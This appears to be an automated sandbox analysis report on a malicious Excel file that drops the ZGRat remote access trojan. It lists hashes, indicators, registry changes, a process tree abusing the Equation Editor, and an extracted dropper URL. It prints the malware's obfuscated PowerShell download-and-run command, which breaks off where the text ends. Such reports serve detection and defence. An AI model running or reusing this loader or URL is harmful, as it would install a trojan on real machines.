zgrat | 2672783b07d4a03225cd11b484092db5792617647ba2f3ac4b447e22a9d0ed16

Analysis

max time kernel
119s
max time network
122s
platform
windows7_x64
resource
win7-20231020-en
resource tags

arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
submitted
23/10/2023, 16:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEAS.2672783b07d4a03225cd11b484092db5792617647ba2f3ac4b447e22a9d0ed16xlsx_JC.xls
Size

220KB
MD5

15c921cb2dac8d0ee2ca4fbe7f7c0989
SHA1

18bbe85e71bc15b10da55f70796ac86bd75936d9
SHA256

2672783b07d4a03225cd11b484092db5792617647ba2f3ac4b447e22a9d0ed16
SHA512

6000006878ddf4446602606e85f2aa958b3952c1e109f85651b1254018faac844841418fb3f0bd951693aa5e6867e89997fe070785aed857566d4b93e60365ce
SSDEEP

6144:9Y35qAOJl/YrLYz+WrNhZF+E+fgL+0dD8ivSbVqfMIkoR0/WU/6FG07W:E3bVqfMIkoR0wG07W

Score

10^/10

zgrat rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg

exe.dropper

https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg

Signatures

Detect ZGRat V1 21 IoCs

resource	yara_rule
behavioral1/memory/1760-113-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1760-114-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1760-116-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1760-118-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1760-120-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1760-122-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1760-125-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1760-127-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1760-129-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1760-131-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1760-133-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1760-135-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1760-138-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1760-140-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1760-142-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1760-144-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1760-146-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1760-148-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1760-150-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1760-152-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1760-154-0x0000000006710000-0x0000000006A2A000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Blocklisted process makes network request 2 IoCs

flow	pid	Process
9	1120	EQNEDT32.EXE
11	1760	powershell.exe

Abuses OpenXML format to download file from external location

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
1120	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2144	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2172	powershell.exe
1760	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2172	powershell.exe
Token: SeDebugPrivilege	1760	powershell.exe
Token: SeShutdownPrivilege	2720	WINWORD.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2144	EXCEL.EXE
2144	EXCEL.EXE
2144	EXCEL.EXE
2720	WINWORD.EXE
2720	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 1120 wrote to memory of 3044	1120	EQNEDT32.EXE	31
PID 1120 wrote to memory of 3044	1120	EQNEDT32.EXE	31
PID 1120 wrote to memory of 3044	1120	EQNEDT32.EXE	31
PID 1120 wrote to memory of 3044	1120	EQNEDT32.EXE	31
PID 2720 wrote to memory of 1508	2720	WINWORD.EXE	32
PID 2720 wrote to memory of 1508	2720	WINWORD.EXE	32
PID 2720 wrote to memory of 1508	2720	WINWORD.EXE	32
PID 2720 wrote to memory of 1508	2720	WINWORD.EXE	32
PID 3044 wrote to memory of 2172	3044	WScript.exe	33
PID 3044 wrote to memory of 2172	3044	WScript.exe	33
PID 3044 wrote to memory of 2172	3044	WScript.exe	33
PID 3044 wrote to memory of 2172	3044	WScript.exe	33
PID 2172 wrote to memory of 1760	2172	powershell.exe	36
PID 2172 wrote to memory of 1760	2172	powershell.exe	36
PID 2172 wrote to memory of 1760	2172	powershell.exe	36
PID 2172 wrote to memory of 1760	2172	powershell.exe	36

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\NEAS.2672783b07d4a03225cd11b484092db5792617647ba2f3ac4b447e22a9d0ed16xlsx_JC.xls
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2144

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2720
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1508

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1120
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\audiodgse.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3044
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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